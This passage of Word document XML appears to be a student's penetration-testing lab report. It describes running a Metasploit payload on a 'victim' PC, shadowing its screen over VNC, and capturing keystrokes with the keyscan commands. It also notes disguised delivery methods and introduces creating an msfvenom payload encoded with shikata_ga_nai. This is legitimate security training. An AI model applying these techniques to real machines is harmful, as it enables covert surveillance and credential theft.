        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="730" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Desktop name "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>win_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-pc" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="427"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5734050" cy="4302125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9641" name="Picture 9641"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="9641" name="Picture 9641"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="4302125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="44" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">You could now see the Payload executed….. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="91"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9055" w:type="dxa"/>
        <w:tblInd w:w="-14" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="246" w:type="dxa"/>
          <w:left w:w="14" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9055"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9055" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Record your reflections on exploiting client side vulnerabilities and create </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9055" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">virtual network computing: </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000357A3" w:rsidRDefault="000357A3">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000357A3" w:rsidRDefault="000357A3">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Once I had gained access by executing the payload on the victim side. Using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. I then ran the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>sysinfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to confirm it was the correct device. I was then able to run an array of exploits. For example I ran the VNC client and I was able to screen shadow the victim PC. I then also ran a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>keyboard_send</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> and was able to send keystrokes to the victim device. I then looked to capture the keystrokes on the victim device by using the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>keyscan_start</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>keyscan_stop</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> &amp; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>keyscan_dump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> commands. I was able to replicate a using typing in information to a sensitive web platform and capture it via the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>keydump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> on the exploit machine.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000357A3" w:rsidRDefault="000357A3">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000357A3" w:rsidRPr="000357A3" w:rsidRDefault="000357A3">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">The exploit file </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>itself</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> could be sent in many formats, either via </w:t>
            </w:r>
            <w:r w:rsidR="00C416A1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>web links</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>/emails/embedded in picture or video files or even pretending to be another application the victim is perhaps expecting to receive. Once this is activated the amount of exploits that can be ran and control gained over the victim machine is high level.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="32" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="87" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="210" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>MSFVENOM to create Payload (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>) and Escalate Privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="291" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="1908" w:right="3" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Refer to your previous lab for detailed description </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="244" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="-15" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CREATE PAYLOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="759" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>19203</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5477256" cy="525780"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="9659" name="Group 9659"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5477256" cy="525780"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5477256" cy="525780"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="11603" name="Shape 11603"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5187696" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5187696" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5187696" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5187696"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1604" name="Shape 11604"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="175260"/>
                            <a:ext cx="5477256" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5477256" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5477256" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5477256"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1605" name="Shape 11605"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="350520"/>
                            <a:ext cx="2164080" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2164080" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2164080" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2164080"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g:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="72AB873E" id="Group 9659" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:1.5pt;width:431.3pt;height:41.4pt;z-index:-251654144" coordsize="54772,5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k6SAAMAAFQNAAAOAAAAZHJzL2Uyb0RvYy54bWzsV1tP2zAUfp+0/2DlfeRC00LUlocxeJk2&#10;NNgPMI5zkRLbsk1T/v2OT+I0pRMgxtCk0Yf4xD7Xz/5OneXZtm3IhmtTS7EK4qMoIFwwmdeiXAU/&#10;by4+nQTEWCpy2kjBV8E9N8HZ+uOHZacynshKNjnXBJwIk3VqFVTWqiwMDat4S82RVFzAYiF1Sy28&#10;6jLMNe3Ae9uESRTNw07qXGnJuDEwe94vBmv0XxSc2e9FYbglzSqA3Cw+NT5v3TNcL2lWaqqqmg1p&#10;0Bdk0dJaQNDR1Tm1lNzp+sBVWzMtjSzsEZNtKIuiZhxrgGri6EE1l1reKaylzLpSjTABtA9werFb&#10;9m1zpUmdr4LTeXoaEEFb2CUMTHAGAOpUmYHepVbX6koPE2X/5mreFrp1I1RDtgjt/Qgt31rCYDKd&#10;LRZJOg8Ig7U0SRcnA/asgg06MGPVl8cNQx82dNmNyXQKjpHZIWX+DKnriiqOG2AcAgNScTyPjj1U&#10;qEL6KYQGNUegTGYAs2ejFJ8s5qcDSvEiTeaI0lgszdidsZdcIt5089XY/gDnXqKVl9hWeFEDDR4l&#10;gKLW2bk0nUg62COfSgW07jNxy63c8BuJivbBrkGWu9VGTLVGZ/5ggK7X8KNCf1PNPQC8mh97daA0&#10;uHy2okezdwJJuGrXy0FABECeYtwIBwaEYRS6U9FQizRvawttq6lbCJ4somjnGLy5Q9jvOkr2vuEO&#10;sEb84AVQDSniJowubz83mmyoa074c/0IsQFVp1LUTTNaxRh6z+oCfmPwQdnZcWx9o2XUW7IhYN//&#10;oItAXb4LQtTRCCNLYUd7Ab0bU5sU5MRbmd9jR8CagXiuWbwRA2eHDJy5HF0CwNXnMnB3dgCA3/Wc&#10;nQJA5Fvd9Ij8XRr6vvkqNPTOnqbhRHMPAE8/P77T0JH3P6ZhekjD9AU0PE6jNBmuBJ6GSTyfRXBP&#10;wDvD3il8cxqOqbwGDUdnT9JwqrkHgKefH99p+G/SEG+ncHXHf/XhM8N9G0zf8caw+xha/wIAAP//&#10;AwBQSwMEFAAGAAgAAAAhAAzX9a/cAAAABQEAAA8AAABkcnMvZG93bnJldi54bWxMj0FLw0AQhe+C&#10;/2EZwZvdpKUhxGxKKeqpCLaCeJsm0yQ0Oxuy2yT9944nPc0b3vDeN/lmtp0aafCtYwPxIgJFXLqq&#10;5drA5/H1KQXlA3KFnWMycCMPm+L+LseschN/0HgItZIQ9hkaaELoM6192ZBFv3A9sXhnN1gMsg61&#10;rgacJNx2ehlFibbYsjQ02NOuofJyuFoDbxNO21X8Mu4v593t+7h+/9rHZMzjw7x9BhVoDn/H8Isv&#10;6FAI08ldufKqMyCPBAMrGWKmyTIBdRKxTkEXuf5PX/wAAAD//wMAUEsBAi0AFAAGAAgAAAAhALaD&#10;OJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYA&#10;CAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYA&#10;CAAAACEA0n5OkgADAABUDQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEADNf1r9wAAAAFAQAADwAAAAAAAAAAAAAAAABaBQAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAGMGAAAAAA==&#10;">
                <v:shape id="Shape 11603" o:spid="_x0000_s1027" style="position:absolute;width:51876;height:1752;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5187696,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vXecQA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERP30vDMBB+F/Y/hBv4IluyCXN0y4aIQh8G4tT3o7km&#10;Zc2lNFlb//tFEHy7j+/n7Y+Tb8VAfWwCa1gtFQjiKpiGrYavz7fFFkRMyAbbwKThhyIcD7O7PRYm&#10;jPxBwzlZkUM4FqjBpdQVUsbKkce4DB1x5urQe0wZ9laaHscc7lu5VmojPTacGxx29OKoupyvXsMQ&#10;zel1LMv3q10/1Y11rXqov7W+n0/POxCJpvQv/nOXJs9fbdQj/L6Tb5CH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r13nEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l5187696,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,5187696,175260"/>
                </v:shape>
